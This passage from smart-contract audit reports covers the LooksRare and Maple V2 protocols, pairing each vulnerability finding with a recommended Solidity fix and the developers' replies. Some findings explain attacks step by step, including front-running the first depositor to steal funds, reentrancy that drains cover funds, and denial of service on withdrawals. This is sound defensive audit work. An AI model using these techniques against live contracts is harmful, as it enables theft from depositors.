• Most strategies only validate length mismatches on one side of the order. Also, they don't usually validate that the lengths match between both sides. For example, in the DutchAuction strategy, if the makerAsk has itemIds and amounts arrays of length 2 and 2, then it would be perfectly valid for the takerBid to use itemIds and amounts arrays of length 5 and 7, as long as the first two elements of both arrays match what is expected. (FYI: a related issue was filed for the ItemIdsRange strategy, which is more severe because the mismatched lengths can actually be returned from the function.)
Recommendation: Consider adding validation checks also for the parameters mentioned above, mainly for consistency reasons.
LooksRare: Acknowledged.
Spearbit: Acknowledged.

+5.5.31 LooksRareProtocol's owner can take maker's tokens for signed orders with unimplemented strategyIds
Severity: Informational
Context:
• StrategyManager.sol#L55
• ExecutionManager.sol#L210-L212
• ExecutionManager.sol#L124-L126
Description: If a maker signs an order that uses a strategyId that hasn't been added to the protocol yet, the protocol owner can add a malicious strategy afterward such that a taker would be able to provide no fulfillment but take all the offers.
Recommendation: The above should be highlighted for makers. For example, calls to checkMakerAskOrderValidity or checkMakerBidOrderValidity would return validationCodes[0] == STRATEGY_NOT_IMPLEMENTED for such a maker, which should signal them to not sign the order.
LooksRare: Yes, it will be highlighted. By definition, it is possible to do anything in signatures since these exist purely off chain. A similar finding would exist with asset types as well.
Spearbit: Acknowledged.

+5.5.32 Strategies with faulty price feeds can have unwanted consequences
Severity: Informational
Context:
• StrategyUSDDynamicAsk.sol#L92
• StrategyFloorFromChainlink.sol#L370
Description: In the LooksRare protocol, once a strategy has been added, its implementation and selector cannot be updated. This is good, since users who sign their MakerBid or MakerAsk can trustlessly examine the strategy implementation before including it in their orders. Some strategies, however, might depend on other actors such as price feeds. This is the case for StrategyUSDDynamicAsk and StrategyFloorFromChainlink. If for some reason these price feeds do not return the correct prices, these strategies can deviate slightly from their original intent.

Case StrategyUSDDynamicAsk: If the price feed returns a lower price, a taker can bid on an order with that lower price. This scenario is guarded by the MakerAsk's minimum price, but the maker would not receive the expected amount if the correct price had been reported and was greater than the maker's minimum ask.

Case StrategyFloorFromChainlink: For executeFixedDiscountCollectionOfferStrategyWithTakerAsk and executeBasisPointsDiscountCollectionOfferStrategyWithTakerAsk, if the price feed reports a floor price higher than the maker's maximum bid price, the taker can match with the maximum bid. Thus the maker ends up paying more than the actual floor adjusted by the discount formula. For executeFixedPremiumStrategyWithTakerBid and executeBasisPointsPremiumStrategyWithTakerBid, if the price feed reports a floor price lower than the maker's minimum ask price, the taker can match with the minimum ask price and pay less than the actual floor price (adjusted by the premium).

Recommendation: The above scenarios regarding the strategies depending on external price feeds would need to be documented/commented for the users.
LooksRare: Acknowledged.
Spearbit: Acknowledged.

+5.5.33 The provided price to IERC2981.royaltyInfo does not match the specifications
Severity: Informational
Context:
• CreatorFeeManagerWithRebates.sol#L52
• CreatorFeeManagerWithRoyalties.sol#L57
Description: In both CreatorFeeManagerWithRoyalties and CreatorFeeManagerWithRebates, if royaltyFeeRegistry.royaltyInfo does not return a non-zero creator address, we check whether the collection supports IERC2981 and, if it does, we loop over each itemId and call the collection's royaltyInfo endpoint. But the input price parameter provided to this endpoint does not match the specification of EIP-2981:

/// @param _salePrice - the sale price of the NFT asset specified by _tokenId

The price provided in the viewCreatorFeeInfo functions is the price for the whole batch of itemIds, not for the individual tokens itemIds[i] provided to the royaltyInfo endpoint. Even if the return values (newCreator, newCreatorFee) all match, it would not mean that newCreatorFee should be used as the royalty for the whole batch. An example is a royalty that is not percentage-based, but a fixed price.
Recommendation: There isn't a way around the above issue (since, given a price for the whole batch, there isn't a unique price distribution that sums up to the given price) unless one adopts a different EIP/strategy. In general, there are cases in which we might pay more or less royalty than actually specified. It would be best to comment on and document the above issue if the protocol decides to use the current strategies.
LooksRare: Acknowledged, but there is (unfortunately) no standard to properly handle bundles.
Spearbit: Acknowledged.

+5.5.34 Replace the abi.encodeWithSelector with abi.encodeCall to ensure type and typo safety
Severity: Informational
Context:
• CreatorFeeManagerWithRebates.sol#L52
• CreatorFeeManagerWithRoyalties.sol#L57
• OrderValidatorV2A.sol#L605
• OrderValidatorV2A.sol#L622
• OrderValidatorV2A.sol#L634
• OrderValidatorV2A.sol#L676
• OrderValidatorV2A.sol#L690
• OrderValidatorV2A.sol#L709
• OrderValidatorV2A.sol#L787
• OrderValidatorV2A.sol#L878
(also applies to lowLevelCallers)
Description: In the context above, abi.encodeWithSelector is used to create the call data for a call to an external contract. This function does not guard against mismatched types being used for the input parameters.
Recommendation: It would be best to use abi.encodeCall to ensure type and typo safety. The code in this context can be transformed from abi.encodeWithSelector(I.f.selector, arg1, ..., argN) to abi.encodeCall(I.f, (arg1, ..., argN)).
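Concretely, using the royaltyInfo call from the context above as an example (a sketch; variable names are illustrative):

// Type-checked at compile time: wrong argument types or a typo in the
// function reference will not compile.
bytes memory data = abi.encodeCall(IERC2981.royaltyInfo, (itemId, price));

// Produces equivalent bytes, but the arguments are not checked against the signature:
bytes memory legacy = abi.encodeWithSelector(IERC2981.royaltyInfo.selector, itemId, price);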
The recommendation does not apply to:
• ExecutionManager.sol#L125
• ExecutionManager.sol#L211
• TransferSelectorNFT.sol#L90
LooksRare: Fixed in PR 298.
Spearbit: Verified.

+5.5.35 Use the inline keccak256 with the formatting suggested when defining a named constant for an EIP-712 type hash
Severity: Informational
Context:
• OrderStructs.sol#L14
• OrderStructs.sol#L20
• OrderStructs.sol#L26
Description: Hardcoded bytes32 EIP-712 type hashes are defined in the OrderStructs library.
Recommendation: Use the compile-time inlined keccak256 with the formatting below to avoid possible future mistakes:

// an example without an inner struct field
struct ExampleStruct {
    type1 f1;
    type2 f2;
    ...
    typeN fn;
}

bytes32 internal constant _EXAMPLE_HASH = keccak256(
    "ExampleStruct("
        "type1 f1,"
        "type2 f2,"
        ...
        "typeN fn"
    ")"
);

LooksRare: PR 297.
Spearbit: Verified.

diff --git a/findings_newupdate/spearbit/MapleV2.txt b/findings_newupdate/spearbit/MapleV2.txt
new file mode 100644
index 0000000..483999b
--- /dev/null
+++ b/findings_newupdate/spearbit/MapleV2.txt
@@ -0,0 +1,52 @@
+5.1.1 First pool depositor can be front-run and have part of their deposit stolen
Severity: High Risk
Context: pool-v2::Pool.sol#L73
Description: The first deposit with a totalSupply of zero shares will mint shares equal to the deposited amount. This makes it possible to deposit the smallest unit of a token and profit off a rounding issue in the computation for the minted shares of the next depositor:

(shares_ * totalAssets()) / totalSupply_

Example:
• The first depositor (victim) wants to deposit 2M USDC (2e12) and submits the transaction.
• The attacker front-runs the victim's transaction by calling deposit(1) to get 1 share. They then transfer 1M USDC (1e12) to the contract, such that totalAssets = 1e12 + 1, totalSupply = 1.
• When the victim's transaction is mined, they receive 2e12 / (1e12 + 1) * totalSupply = 1 share (rounded down from 1.9999...).
• The attacker withdraws their 1 share and gets 3M USDC * 1 / 2 = 1.5M USDC, making a 0.5M profit.
During the migration, an _initialSupply of shares to be airdropped is already minted at initialization, so the migration is not affected by this attack.
Recommendation: Require a minimum initial shares amount for the first deposit by adjusting the initial mint (when totalSupply == 0) such that:
• an INITIAL_BURN_AMOUNT of shares is minted to a dead address like address zero, and
• only depositAmount - INITIAL_BURN_AMOUNT is minted to the recipient.
INITIAL_BURN_AMOUNT needs to be chosen large enough that the attack is not profitable when minting low share amounts, but low enough that not too many shares are taken from the user. We recommend using an INITIAL_BURN_AMOUNT of 1000.
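A minimal sketch of this mitigation (names are illustrative; assumes an ERC20-style internal _mint and totalSupply; note that the team ultimately chose a different approach, discussed below):

// Sketch only: burn a fixed number of shares on the very first deposit.
uint256 internal constant INITIAL_BURN_AMOUNT = 1000;
address internal constant DEAD_ADDRESS = address(0xdead); // a dead address, e.g. address zero

function _mintShares(address receiver_, uint256 shares_) internal {
    if (totalSupply == 0) {
        // The attack needs totalSupply to stay tiny; permanently locking
        // 1000 shares makes inflating the share price unprofitable.
        require(shares_ > INITIAL_BURN_AMOUNT, "P:M:BELOW_MIN_DEPOSIT");
        _mint(DEAD_ADDRESS, INITIAL_BURN_AMOUNT);
        shares_ -= INITIAL_BURN_AMOUNT;
    }
    _mint(receiver_, shares_);
}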
Spearbit: Here's the script that I used to check the values for different scenarios.
Maple: What do you guys think of this approach? #210. Basically, instead of stealing a small amount of assets from the first depositor to mint shares to a nonexistent address, thereby throwing those assets away forever and asymmetrically harming just the first honest depositor, this PR just "assumes" an amount of shares was minted, backed by an equal amount of assets. This way, the starting rate is still 1 share per asset, but no real assets are locked away behind any irredeemable shares.
Spearbit: It makes the code more complicated; you need to add this amount to assets and totalSupply everywhere and may not forget it. Now there's suddenly a discrepancy between pool.totalAssets() and PM.totalAssets(). It is also problematic when assets & totalSupply contain "virtual" balances that are not in the contract, as it breaks invariants like asset.balanceOf(pool) + LM.assetsUnderManagement() == pool.totalAssets(), and you need to make sure that it's impossible to transfer out these virtual balances, as it would revert. Which is an issue in your case. Let's say you start with a virtual balance of 1000 supply / 1000 assets, then I deposit 1000 assets and get another 1000 shares. A loan is funded with my 1000 assets, but it defaults and only 500 assets are recovered. Now I withdraw my 1000 shares and should get a transfer out of shares * (totalAssets + BOOTSTRAP_MINT) / (totalSupply + BOOTSTRAP_MINT) = 1000 * (500 + 1000 virtual) / 2000 = 750, yet there's only 500 in the contract. This only happens because you have a virtual balance that is not backed by actual assets. If the first depositor had deposited these funds, you could get out your entire 750. In our opinion, it's okay to "steal" less than 1 cent from the first depositor; they're already paying $5 in gas fees. What you could think about is to have the PoolDeployer always be the first depositor, keep a small funds balance in it, and do a funds.transferFrom + mint for them in the pool constructor.
Maple: This is our current working PR #219; note there are still some comments to be addressed, but you can see the approach we are taking. Merged PR: #219 ready for review. Merged this as well to make the mint param globally configurable by the governor: #40.
Spearbit: Fixed.

5.2 Medium Risk

+5.2.1 Users depositing to a pool with unrealized losses will take on the losses
Severity: Medium Risk
Context: pool-v2::Pool.sol#L278, pool-v2::Pool.sol#L275
Description: The pool share price used for deposits is always totalAssets() / totalSupply, however the pool share price when redeeming is (totalAssets() - unrealizedLosses()) / totalSupply. The unrealizedLosses value is increased by loan impairments (LM.impairLoan) or when triggering a default with a liquidation (LM.triggerDefault). The totalAssets are only reduced by this value when the loss is realized in LM.removeLoanImpairment or LM.finishCollateralLiquidation. This leads to a time window where deposits use a much higher share price than current redemptions and future deposits. Users depositing to the pool during this time window are almost guaranteed to make losses when they are realized. In the worst case, a Pool.deposit might even be (accidentally) front-run by a loan impairment or liquidation.
Recommendation: Make it very clear to the users when there are unrealized losses and communicate that it is a bad time to deposit. Furthermore, consider adding an expectedMinimumShares parameter that is checked against the actual minted shares. This ensures that users don't accidentally lose shares when front-run. Note that this would need to be a new deposit(uint256 assets_, address receiver_, uint256 expectedMinimumShares_) function to not break the ERC4626 compatibility. The Pool.mint function has a similar issue, whereas the Pool.mintWithPermit function already accepts a maxAssets_ parameter.
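A sketch of such a slippage-protected entry point (illustrative; assumes the existing two-parameter deposit is public and returns the minted shares):

// Sketch only: additive overload, keeps ERC4626 deposit(assets, receiver) intact.
function deposit(
    uint256 assets_,
    address receiver_,
    uint256 expectedMinimumShares_
) public returns (uint256 shares_) {
    shares_ = deposit(assets_, receiver_);
    // Reverts if the pool's share price moved against the depositor
    // (e.g. due to a front-running impairment or liquidation).
    require(shares_ >= expectedMinimumShares_, "P:D:SLIPPAGE");
}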
Maple: Yes, our team is aware of this issue and plans on making it very clear to users through our front end and documentation that depositing is not recommended while there are unrealized losses. The alternative of not using two exchange rates introduces another vulnerability, which is that users could front-run a payment or the reversion of an impairment and profit from the exchange rate change.
Spearbit: Acknowledged.

+5.2.2 TransitionLoanManager.add does not account for accrued interest since last call
Severity: Medium Risk
Context: pool-v2::TransitionLoanManager.sol#L74
Description: TransitionLoanManager.add advances the domain start, but the interest accrued since the last domain start is not accounted for. If add is called several times, the accounting will be wrong, as it incorrectly tracks the _accountedInterest variable.
Recommendation: Consider tracking the accrued interest, or ensure that MigrationHelper.addLoansToLM is called only once in the final migration script, adding all loans at the same time:

function add(address loan_) external override nonReentrant {
    ...
    uint256 domainStart_ = domainStart;
    uint256 accruedInterest;
    if (domainStart_ == 0 || domainStart_ != block.timestamp) {
        accruedInterest = getAccruedInterest();
        domainStart = _uint48(block.timestamp);
    }
    ...
    _updateIssuanceParams(issuanceRate += newRate_, accountedInterest + accruedInterest);
}

This mimics LoanManager._advanceGlobal as long as there are no late payments, but that's also the case for TransitionLoanManager, as one of the preconditions for the migration is that loans have at least 5 days before any payment is due.
Maple: In theory yes, but realistically we'll add all loans atomically. Even in the largest pool, we have around 30 active loans, which is feasible to do in one transaction. This is not an issue since all loans are added atomically, but we can add this functionality to be defensive on the TLM side.
Spearbit: Not fixed, see comment.
Maple: Here is the PR for the fix to your comment: #218.
Spearbit: Fixed.

+5.2.3 Unaccounted collateral is mishandled in triggerDefault
Severity: Medium Risk
Context: pool-v2::LoanManager.sol#L563
Description: The control flow of triggerDefault is partially determined by the value of MapleLoanLike(loan_).collateral() == 0. The code later assumes there are 0 collateral tokens in the loan if this value is true, which is incorrect in the case of unaccounted collateral tokens. In non-liquidating repossessions, this causes an overestimation of the number of fundsAsset tokens repossessed, leading to a revert in the _disburseLiquidationFunds function. Anyone can trigger this revert by manually transferring 1 wei of collateralAsset to the loan itself. In liquidating repossessions, a similar issue causes the code to call the liquidator's setCollateralRemaining function with only the accounted collateral, meaning unaccounted collateral will be unused/stuck in the liquidator.
Recommendation: In both cases, use the collateral token's balanceOf function to measure the amount of collateral tokens in the loan, for example:

- if (IMapleLoanLike(loan_).collateral() == 0 || IMapleLoanLike(loan_).collateralAsset() == fundsAsset) {
+ address collateralAsset_ = IMapleLoanLike(loan_).collateralAsset();
+ if (IERC20Like(collateralAsset_).balanceOf(loan_) == 0 || collateralAsset_ == fundsAsset) {

Maple: Fixed in #211.
Spearbit: Fixed.

+5.2.4 Initial cycle time is wrong when queuing several config updates
Severity: Medium Risk
Context: withdrawal-manager::WithdrawalManager.sol#L123
Description: The initial cycle time will be wrong if there is already an upcoming config change that changes the cycle duration. Example:

currentCycleId: 100
config[0] = currentConfig = {initialCycleId: 1,   cycleDuration: 1 days}
config[1] =                 {initialCycleId: 101, cycleDuration: 7 days}

Now, scheduling will create a config with initialCycleId: 103 and initialCycleTime = now + 3 * 1 days, but the cycle durations for cycles (100, 101, 102) are 1 days + 7 days + 7 days.
Recommendation: Optimistically "apply" (just for the computation, not actually activating it) any pending configs for a cycle ID, then sum up the cycle durations for the cycles [currentCycleId, currentCycleId + 1, currentCycleId + 2]. Add the result to getWindowStart(currentCycleId_).
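A sketch of that computation (assumes the existing getWindowStart helper; _configToUseFor is an illustrative helper that returns the config — current or already-queued — that will be in effect for a given cycle):

// Sketch only: sum the durations of the next three cycles using the config
// that will actually be active for each of them.
function _getInitialCycleTime(uint256 currentCycleId_) internal view returns (uint256 initialCycleTime_) {
    initialCycleTime_ = getWindowStart(currentCycleId_);
    for (uint256 i; i < 3; ++i) {
        initialCycleTime_ += _configToUseFor(currentCycleId_ + i).cycleDuration;
    }
}

With the example above, this yields now + (1 days + 7 days + 7 days) instead of now + 3 * 1 days.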
Maple: Fixed in #50.
Spearbit: Fixed.

5.3 Low Risk

+5.3.1 Users cannot resubmit a withdrawal request as per the wiki
Severity: Low Risk
Context: pool-v2::PoolManager.sol#371-L382, pool-v2::Pool.sol#L210-L224, withdrawal-manager::WithdrawalManager.sol#L151-L176
Description: As per Maple's wiki:
• Refresh: The withdrawal request can be resubmitted with the same amount of shares by calling pool.requestRedeem(0).
However, the current implementation prevents Pool.requestRedeem() from being called where the shares_ parameter is zero.
Recommendation: Consider removing the below require statement found in Pool._requestRedeem():

  function _requestRedeem(uint256 shares_, address owner_) internal returns (uint256 escrowShares_) {
-     require(shares_ != 0, "P:RR:ZERO_SHARES");
      ...

Maple: Issue addressed in PR #183.
Spearbit: The PR introduced an issue where anyone can DoS the withdrawal process by front-running calls to process a share redemption with a call to requestRedeem(), thereby refreshing the request before the user is able to process a withdrawal. The fix here does not sufficiently cover the edge case where a non-owner account can arbitrarily push a user's request to redeem shares back by two cycles. Any call to process a redemption can be front-run, because a new request can be made as long as block.timestamp >= getWindowStart(exitCycleId_). Making a new request to redeem shares with zero as a parameter can be done by any user, as it does not require the caller to be the owner, nor does it expect the caller to have an approved amount. If an attacker can perpetually front-run a user's attempts to redeem shares, it would be a valid DoS attack on the withdrawal manager.
Maple: But if you check out Pool.sol, in the _requestRedeem() helper function we do check if the msg.sender != owner and use an allowance in that case: Pool.sol#L230. Does this address your concern?
Spearbit: We would be explicitly requesting to redeem zero shares. The allowance checks will not revert, because we don't need a pre-approved amount for this to execute.
Maple: We'll have stand up in a few hours so I can discuss with the team how best to fix it; do you folks have a suggestion?
Spearbit: The only suggestion that makes the most sense is to only allow the owner to refresh a request.
Maple: Fixed in PR #232 by only allowing the owner or an approved EOA to refresh their request.
Spearbit: Fixed.

+5.3.2 Accrued interest may be calculated on an overstated payment
Severity: Low Risk
Context: migration-helpers::AccountingChecker.sol#L50-L51
Description: The checkTotalAssets() function is a useful helper that may be used to make business decisions in the protocol. However, if there is a late loan payment, the total interest is calculated on an incorrect payment interval, causing the accrued interest to be overstated. It is also important to note that late interest will be excluded from the total interest calculation.
Recommendation: Consider capping the time delta to a maximum of the payment interval. If it is also intended to include late interest, it may be useful to add this calculation to the total interest amount.
Maple: Acknowledged, won't address, as this contract will only be used during the migration, during which we will have no late loans.
Spearbit: Acknowledged.

+5.3.3 No deadline when liquidating a borrower's collateral
Severity: Low Risk
Context: liquidations::Liquidator.sol#L86-L103
Description: A loan's collateral is liquidated in the event of a late payment, or if the pool delegate impairs a loan due to insolvency of the borrower. If the loan contains any amount of collateral (assuming it is different from the funds' asset), the liquidation process will attempt to sell the collateral at a discounted amount. Because a liquidation is considered active as long as there is remaining collateral in the liquidator contract, a user can knowingly liquidate all but 1 wei of collateral. As there is no incentive for others to liquidate this dust amount, it is up to the loan manager to incur the cost and responsibility of liquidating this amount before they can successfully call LoanManager.finishCollateralLiquidation().
Recommendation: Consider adding a deadline to the liquidation process. After this time period has passed, any leftover amount can be claimed by the protocol's treasury, allowing for liquidation finalization. This function hook can be added to the existing LoanManager.finishCollateralLiquidation() as an edge case.
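A minimal sketch of such a deadline (illustrative names and storage layout; assumes the liquidator records when the liquidation started — this is not Maple's actual code):

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.7;

interface IERC20Like {
    function balanceOf(address account) external view returns (uint256);
    function transfer(address to, uint256 amount) external returns (bool);
}

contract LiquidatorDeadlineSketch {
    uint256 public constant LIQUIDATION_DEADLINE = 3 days; // illustrative duration

    address public immutable collateralAsset;
    address public immutable mapleTreasury;
    uint256 public immutable startedAt;

    constructor(address collateralAsset_, address mapleTreasury_) {
        collateralAsset = collateralAsset_;
        mapleTreasury   = mapleTreasury_;
        startedAt       = block.timestamp;
    }

    // Past the deadline, leftover dust is swept to the treasury so that
    // finishCollateralLiquidation can no longer be blocked by 1 wei.
    function sweepLeftoverCollateral() external {
        require(block.timestamp > startedAt + LIQUIDATION_DEADLINE, "LIQ:SLC:NOT_PAST_DEADLINE");
        IERC20Like asset = IERC20Like(collateralAsset);
        asset.transfer(mapleTreasury, asset.balanceOf(address(this)));
    }
}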
Maple: Reevaluated, and will not address, as it is solvable by performing a transaction to liquidate the remaining amount. Inconvenient, but not really an issue.
Spearbit: Acknowledged.

+5.3.4 Loan impairments can be unavoidably unfair for borrowers
Severity: Low Risk
Context: loan::MapleLoan.sol#L859, pool-v2::LoanManager.sol#L233
Description: When a pool delegate impairs a loan, the loan's _nextPaymentDueDate will be set to the min of block.timestamp and the current _nextPaymentDueDate. If the pool delegate later decides to remove the impairment, the original _nextPaymentDueDate is restored to its correct value. The borrower can also remove an impairment themselves by making a payment. In this case, the _nextPaymentDueDate is not restored, which is always worse for the borrower. This can be unfair, since the borrower would have to pay late interest on a loan that was never actually late (according to the original payment due date). Another related consequence is that a borrower can be liquidated before the original payment due date even passes (this is possible as long as the loan is impaired more than gracePeriod seconds before the original due date).
Recommendation: Ensure that these subtleties are documented and made clear to borrowers. Also, consider mitigating this unfair behavior. This can be done by restoring _nextPaymentDueDate when a borrower makes a payment on an impaired loan, and by explicitly enforcing that a loan can never be liquidated before the next payment's original due date.
Maple: Discussed with the business team and we want to keep it as is; this will be in the loan agreements with the borrowers.
Spearbit: Acknowledged.

+5.3.5 withdrawCover() vulnerable to reentrancy
Severity: Low Risk
Context: pool-v2 (v1.0.0-rc.1)::PoolManager.sol#L407
Description: withdrawCover() allows for reentrancy and could be abused to withdraw below the minimum cover amount and avoid having to cover protocol insolvency through a bad liquidation or loan default. The moveFunds() function could transfer the asset amount to the recipient specified by the pool delegate. Some tokens allow for callbacks before the actual transfer is made. In this case, the pool delegate could reenter the withdrawCover() function and bypass the balance check, as it is made before tokens are actually transferred. This can be repeated to empty out the required cover balance from the contract. It is noted that the PoolDelegateCover contract is a protocol-controlled contract, hence the low severity.
Recommendation: This can be mitigated by moving the balance check below the moveFunds() line:

@@ -397,15 +398,15 @@ contract PoolManager is IPoolManager, MapleProxiedInternals, PoolManagerStorage
      require(msg.sender == poolDelegate, "PM:WC:NOT_PD");

-     require(
-         amount_ <= (IERC20Like(asset).balanceOf(poolDelegateCover) - IMapleGlobalsLike(globals()).minCoverAmount(address(this))),
-         "PM:WC:BELOW_MIN"
-     );

      recipient_ = recipient_ == address(0) ? msg.sender : recipient_;

      IPoolDelegateCoverLike(poolDelegateCover).moveFunds(amount_, recipient_);

+     require(
+         IERC20Like(asset).balanceOf(poolDelegateCover) >= IMapleGlobalsLike(globals()).minCoverAmount(address(this)),
+         "PM:WC:BELOW_MIN"
+     );

Maple: Fixed in #188.
Spearbit: Fixed.

+5.3.6 Bad parameter encoding and deployment when using wrong initializers
Severity: Low Risk
Context: pool-v2 (v1.0.0-rc.1)::PoolDeployer.sol#L32-L77
Description: The initializers used to encode the arguments when deploying a new pool in PoolDeployer might not be the initializers that the proxy factory will use for the default version, which might lead to bad parameter encoding & deployments if a wrong initializer is passed.
Recommendation: Check the initializers while deploying a new pool:

function deployPool(
    address[3] memory factories_,
    address[3] memory initializers_,
    address asset_,
    string memory name_,
    string memory symbol_,
    uint256[6] memory configParams_
) external override returns (...) {
    address poolDelegate_ = msg.sender;

    IMapleGlobalsLike globals_ = IMapleGlobalsLike(globals);

    require(globals_.isPoolDelegate(poolDelegate_), "PD:DP:INVALID_PD");

    require(globals_.isFactory("POOL_MANAGER",       factories_[0]), "PD:DP:INVALID_PM_FACTORY");
    require(globals_.isFactory("LOAN_MANAGER",       factories_[1]), "PD:DP:INVALID_LM_FACTORY");
    require(globals_.isFactory("WITHDRAWAL_MANAGER", factories_[2]), "PD:DP:INVALID_WM_FACTORY");

+   require(initializers_[0] == factories_[0].migratorForPath(factories_[0].defaultVersion(), factories_[0].defaultVersion()), "PD:DP:INVALID_PM_INITIALIZER");
+   require(initializers_[1] == factories_[1].migratorForPath(factories_[1].defaultVersion(), factories_[1].defaultVersion()), "PD:DP:INVALID_LM_INITIALIZER");
+   require(initializers_[2] == factories_[2].migratorForPath(factories_[2].defaultVersion(), factories_[2].defaultVersion()), "PD:DP:INVALID_WM_INITIALIZER");

    bytes32 salt_ = keccak256(abi.encode(poolDelegate_));
    ...
}

Maple: Fixed in #200.
Spearbit: Fixed.

+5.3.7 Event LoanClosed might be emitted with the wrong value
Severity: Low Risk
Context: loan (v4.0.0-rc.1)::MapleLoan.sol#L92-L124
Description: In closeLoan, the fees are obtained from the getClosingPaymentBreakdown function, which does not add the refinance fees, while later in the code all fees are paid by payServiceFees, which may include refinance fees. The LoanClosed event might therefore be emitted with the wrong fee value.
Recommendation: It is recommended to change getClosingPaymentBreakdown by adding the refinance fees:

  function getClosingPaymentBreakdown() public view override returns (uint256 principal_, uint256 interest_, uint256 fees_) {
      uint256 paymentsRemaining_ = _paymentsRemaining;

-     uint256 delegateServiceFee_ = IMapleLoanFeeManager(_feeManager).delegateServiceFee(address(this)) * paymentsRemaining_;
-     uint256 platformServiceFee_ = IMapleLoanFeeManager(_feeManager).platformServiceFee(address(this)) * paymentsRemaining_;

+     (
+         uint256 delegateServiceFee_,
+         uint256 delegateRefinanceServiceFee_,
+         uint256 platformServiceFee_,
+         uint256 platformRefinanceServiceFee_
+     ) = IMapleLoanFeeManager(_feeManager).getServiceFeeBreakdown(address(this), paymentsRemaining_);

-     fees_ = delegateServiceFee_ + platformServiceFee_;
+     fees_ = delegateServiceFee_ + platformServiceFee_ + delegateRefinanceServiceFee_ + platformRefinanceServiceFee_;
      ...
  }

Maple: Fixed in #238.
Spearbit: Fixed; a test for the event value should be added.

+5.3.8 Bug in makePayment() reverts when called with small amounts
Severity: Low Risk
Context: loan (v4.0.0-rc.1)::MapleLoan.sol#L167
Description: When makePayment() is called with an amount which is less than the fees payable, the transaction will always revert, even if there is an adequate amount of drawable funds. The revert happens due to an underflow in getUnaccountedAmount(), because the token balance is decremented on the previous line without updating drawable funds.
Recommendation: Consider updating the logic so that drawable funds are decremented by the fees before paying them:

@@ -160,11 +160,13 @@ contract MapleLoan is IMapleLoan, MapleProxiedInternals, MapleLoanStorage {
      uint256 principalAndInterest = principal_ + interest_;

-     IMapleLoanFeeManager(_feeManager).payServiceFees(_fundsAsset, 1);

      // The drawable funds are increased by the extra funds in the contract, minus the total needed for payment.
      // NOTE: This line will revert if not enough funds were added for the full payment amount.
-     _drawableFunds = (_drawableFunds + getUnaccountedAmount(_fundsAsset)) - principalAndInterest;
+     _drawableFunds = (_drawableFunds + getUnaccountedAmount(_fundsAsset)) - principalAndInterest - fees_;

+     require(IMapleLoanFeeManager(_feeManager).payServiceFees(_fundsAsset, 1) == fees_, "ML:MP:INCORRECT_FEES");

Alternatively, if this behavior is desired, consider updating the NatSpec and documentation, as well as adding a require(amount >= fees) check.
Maple: Fixed in #250.
Spearbit: Looks good. In the _handleServiceFeePayment() helper, what's the reason for the final else clause at the end? #250-diff

if (balanceBeforeServiceFees_ > balanceAfterServiceFees_) {
    _drawableFunds -= (fees_ = balanceBeforeServiceFees_ - balanceAfterServiceFees_);
} else {
    _drawableFunds += balanceAfterServiceFees_ - balanceBeforeServiceFees_;
}
Spearbit: The PM now reverts for Pool.requestWithdraw & Pool.withdraw. The previewWithdraw function returns 0. Therefore, the behavior is still a little different, but it's acceptable and indeed unclear whether ERC4626 view functions should revert or return 0 in this case; see "IERC4626 Implementation of preview and max functions" for more discussion. I find it a bit strange that getEscrowParams works for both assets_ and shares_ (see _requestRedeem). In an actual implementation, how are you going to differentiate whether the second argument is shares or assets? #225. Please have a look; it might be relevant for future PM upgrades that indeed return something different for each getEscrowParams call.

Maple: Good catch, we were just discussing this on our call; we want to just convert and pass along shares. We're debating whether we should use convertToShares or convertToExitShares on the assets_ and then pass it along to getEscrowParams. We were wondering if you had a recommendation in regard to this for future upgrades?

Spearbit: What are your intentions with this escrow feature and how is it supposed to work? It should be convertToExitShares, because to withdraw 1000 assets from the WM you need to burn 1000 assets converted to exit shares. So this amount should be escrowed.

Maple: That should cover it: #229.

Spearbit: Fixed.

+5.3.10 Setting a new WithdrawalManager locks funds in old one

Severity: Low Risk
Context: pool-v2::PoolManager.sol#L237
Description: The WithdrawalManager only accepts calls from a PoolManager. When setting a new withdrawal manager with PoolManager.setWithdrawalManager, the old one cannot be accessed anymore. Any user shares locked for withdrawal in the old one are stuck.
Recommendation: Before calling this function, ensure that there are no locked shares in the current withdrawal manager.

Maple: Acknowledged, will manage operationally and will capture in documentation. Addressed in WithdrawalMechanism#configuration-management.

Spearbit: Acknowledged.

+5.3.11 Use whenProtocolNotPaused on migrate() instead of upgrade() for more complete protection

Severity: Low Risk
Context:
• Liquidator.sol
• MapleLoan.sol
• WithdrawalManager.sol
Description: whenProtocolNotPaused is added to upgrade() for the Liquidator, MapleLoan, and WithdrawalManager contracts in order to protect the protocol by preventing it from upgrading while the protocol is paused. However, this protection happens only during upgrade, and not during instantiation.
Recommendation: Consider moving the whenProtocolNotPaused modifier from upgrade() to migrate(), since migrate() is called during both the upgrade process and the instantiation process.

--- a/contracts/Liquidator.sol
+++ b/contracts/Liquidator.sol
@@ -52,7 +52,7 @@ contract Liquidator is ILiquidator, LiquidatorStorage, MapleProxiedInternals {

-    function migrate(address migrator_, bytes calldata arguments_) external override {
+    function migrate(address migrator_, bytes calldata arguments_) external override whenProtocolNotPaused {
         require(msg.sender == _factory(),        "LIQ:M:NOT_FACTORY");
         require(_migrate(migrator_, arguments_), "LIQ:M:FAILED");
     }

@@ -63,7 +63,7 @@ contract Liquidator is ILiquidator, LiquidatorStorage, MapleProxiedInternals {
         _setImplementation(implementation_);
     }

-    function upgrade(uint256 version_, bytes calldata arguments_) external override whenProtocolNotPaused {
+    function upgrade(uint256 version_, bytes calldata arguments_) external override {
Maple: Fixed in these PRs:
• #245
• #213
• #214
• #215
• #52
• #54

This actually has introduced a problem: if there is no migrator contract, this will not revert on pause for either upgrade or deploy. ProxyFactory.sol#L26. Thinking of the best approach to this; it might be worth adding a pause in the MPF itself.

Spearbit: Adding a pause to the MPF would mean you can never deploy/upgrade any contract while the protocol is paused? But maybe you want to be able to do that for some contracts/migrations. If you want to do the same as now and keep the responsibility of whether you allow migrations during pause in the implementation contract, there's also another approach: always call proxy.migrate in the MPF, even with a zero address for the initializer, but then do nothing in ProxiedInternals._migrate (more specifically, return true if migrator_ == 0 and arguments_ is empty).

Maple: We have leant towards adding the pause to the MPF; in the case of a protocol pause we can always bundle transactions if we need to upgrade. Here is the PR for the update: #38. To summarize, we will be reverting the changes in the rest of the repos to remove the pausing functionality from both upgrade and migrate, since it will be in the MPF. These reversions will be made everywhere except the Loan, since the LoanFactory is already deployed on mainnet. #38 is merged. #214 was closed as it is no longer relevant.

Spearbit:
• Pause added to MPF in #38.
• Pause removed from PM/LM here: #222.
• Pause removed from WM here: #54.
